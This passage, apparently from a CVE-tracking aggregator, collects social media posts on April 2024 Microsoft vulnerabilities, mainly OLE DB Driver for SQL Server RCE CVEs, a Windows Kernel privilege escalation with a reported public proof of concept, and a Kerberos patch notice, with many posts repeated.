  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-26218
(7.8 HIGH)

EPSS: 0.04%

updated 2024-04-09T18:30:35

6 posts

Windows Kernel Elevation of Privilege Vulnerability

1 repos

https://github.com/exploits-forsale/CVE-2024-26218

DarkWebInformer at 2024-04-29T13:04:45.326Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

jos1264@social.skynetcloud.site at 2024-04-29T09:15:02.000Z ##

PoC Exploit Released For Windows Kernel EoP Vulnerability gbhackers.com/windows-kernel-e #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft

##

DarkWebInformer@infosec.exchange at 2024-04-29T13:04:45.000Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

DarkWebInformer at 2024-04-29T13:04:45.326Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

jos1264@social.skynetcloud.site at 2024-04-29T09:15:02.000Z ##

PoC Exploit Released For Windows Kernel EoP Vulnerability gbhackers.com/windows-kernel-e #CVE/vulnerability #CyberSecurityNews #WindowsSecurity #KernelExploit #CVE202426218 #Microsoft

##

DarkWebInformer@infosec.exchange at 2024-04-29T13:04:45.000Z ##

🚨EXPLOIT POC🚨PoC Exploit Released For Windows Kernel EoP Vulnerability.

#Clearnet #DarkWebInformer #DarkWeb #Exploit #Cyberattack #Cybercrime #Windows #Infosec #CTI #CVE202426218 #Vulnerability

One of the vulnerabilities addressed was CVE-2024-26218, associated with the Windows Kernel Privilege Escalation vulnerability, which had a severity of 7.8 (High).

github.com/exploits-forsale/CV

X Link: twitter.com/DarkWebInformer/st

##

CVE-2024-26248
(7.5 HIGH)

EPSS: 0.05%

updated 2024-04-09T18:30:35

2 posts

Windows Kerberos Elevation of Privilege Vulnerability

mick_talbott at 2024-04-19T00:24:21.401Z ##

Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.

Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).

For more details see:
support.microsoft.com/en-us/to

##

mick_talbott@infosec.exchange at 2024-04-19T00:24:21.000Z ##

Buckle up folks still using Microsoft Active Directory Domain Services (AD DS), there's a brand-new security patch for the Kerberos PAC validation protocol. The vulnerabilities are detailed in CVE-2024-26248 and CVE-2024-29056.

Similar to the Kerberos updates released in 2022-2023, further action is needed to remediate these vulnerabilities after installing the patches (now included in the April 2024 and newer monthly cumulative updates (creating Registry keys and values).

For more details see:
support.microsoft.com/en-us/to

##

CVE-2024-28912
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:35

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28909
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:35

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

simontsui@infosec.exchange at 2024-04-18T19:08:07.000Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  9. CVE-2024-28915 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  10. CVE-2024-28926 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  11. CVE-2024-28927 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  12. CVE-2024-28929 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  13. CVE-2024-28930 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  14. CVE-2024-28931 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  15. CVE-2024-28932 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  16. CVE-2024-28933 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  17. CVE-2024-28934 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  18. CVE-2024-28935 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  19. CVE-2024-28936 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  20. CVE-2024-28937 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  21. CVE-2024-28938 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  22. CVE-2024-28939 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  23. CVE-2024-28940 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  24. CVE-2024-28941 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  25. CVE-2024-28942 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  26. CVE-2024-28943 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  27. CVE-2024-28944 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  28. CVE-2024-28945 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  29. CVE-2024-29043 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  30. CVE-2024-29044 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  31. CVE-2024-29045 (7.5 high analyst note: wtf is this? Attack Complexity:High) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  32. CVE-2024-29046 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  33. CVE-2024-29047 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  34. CVE-2024-29048 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  35. CVE-2024-29982 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  36. CVE-2024-29983 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  37. CVE-2024-29984 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  38. CVE-2024-29985 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.

It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.

##

CVE-2024-28906
(8.8 HIGH)

EPSS: 0.09%

updated 2024-04-09T18:30:35

2 posts

Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability

screaminggoat at 2024-04-18T19:08:07.203Z ##
  1. CVE-2024-28906 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  2. CVE-2024-28908 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  3. CVE-2024-28909 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  4. CVE-2024-28910 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  5. CVE-2024-28911 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  6. CVE-2024-28912 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  7. CVE-2024-28913 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
  8. CVE-2024-28914 (8.8 high) Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability
